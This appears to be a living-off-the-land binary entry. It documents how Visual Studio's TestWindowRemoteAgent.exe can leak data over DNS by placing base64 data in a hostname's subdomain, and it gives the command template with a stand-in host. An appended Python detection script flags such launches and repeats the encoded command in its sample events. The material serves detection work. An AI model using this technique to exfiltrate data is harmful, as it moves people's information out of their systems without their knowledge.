.. /TestWindowRemoteAgent.exe
TestWindowRemoteAgent.exe is the command-line tool to establish RPC
Paths:
- C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\RemoteAgent\TestWindowRemoteAgent.exe
Detection:
- IOC: TestWindowRemoteAgent.exe spawning unexpectedly
Upload
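Sends a DNS query for the host given with -h when opening a connection to any host; data placed in that hostname's subdomain label leaves the machine in the query, enabling exfiltration over DNS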
TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000
Usecase: Attackers may utilize this to exfiltrate data over DNS
Privileges required: User
OS: Windows 10, Windows 11
MITRE ATT&CK®: T1048
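
The Detection IOC and the Upload command line above can be turned into a triage check over process-creation events; this is an added example, not part of the original entry. The event field names, the expected-parent allowlist (devenv.exe), the thresholds and the sample events are assumptions constructed for illustration.

```python
import math
import ntpath
import re
from collections import Counter

AGENT = "testwindowremoteagent.exe"
# Assumption: parents treated as normal here; tune to your own baseline.
EXPECTED_PARENTS = {"devenv.exe"}
MAX_LABEL_LEN = 24   # constructed threshold, characters
MIN_ENTROPY = 3.5    # constructed threshold, bits per character
HOST_ARG = re.compile(r'(?:^|\s)-h\s+"?([^\s"]+)', re.IGNORECASE)

def entropy(text):
    counts = Counter(text)
    return -sum(n / len(text) * math.log2(n / len(text)) for n in counts.values())

def review(event):
    """Return triage reasons for one process-creation event ([] if none)."""
    if ntpath.basename(event["image"]).lower() != AGENT:
        return []
    reasons = []
    parent = ntpath.basename(event["parent_image"]).lower()
    if parent not in EXPECTED_PARENTS:
        reasons.append("unexpected parent: " + parent)
    match = HOST_ARG.search(event["command_line"])
    if match:
        host = match.group(1)
        label = max(host.split("."), key=len)  # longest DNS label of the -h host
        if len(label) > MAX_LABEL_LEN or (len(label) >= 12 and entropy(label) >= MIN_ENTROPY):
            reasons.append("encoded-looking label in -h host: " + host)
    return reasons

# Constructed sample events (not real telemetry).
IDE = r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE"
AGENT_PATH = IDE + r"\CommonExtensions\Microsoft\TestWindow\RemoteAgent\TestWindowRemoteAgent.exe"
ENCODED = "TestWindowRemoteAgent.exe start -h c2VjcmV0LWRhdGEtZXhhbXBsZQ.example.com -p 8000"
EVENTS = [
    {"image": AGENT_PATH, "parent_image": IDE + r"\devenv.exe",
     "command_line": "TestWindowRemoteAgent.exe start -h buildhost01 -p 8000"},
    {"image": AGENT_PATH, "parent_image": r"C:\Windows\System32\cmd.exe", "command_line": ENCODED},
    {"image": AGENT_PATH, "parent_image": IDE + r"\devenv.exe", "command_line": ENCODED},
    {"image": r"C:\Windows\System32\notepad.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(ntpath.basename(ev["image"]), review(ev))
```

Feed it events from whatever process-creation source is available (parent image, image and command line are the only fields used), and replace the allowlist with parents observed during normal test runs.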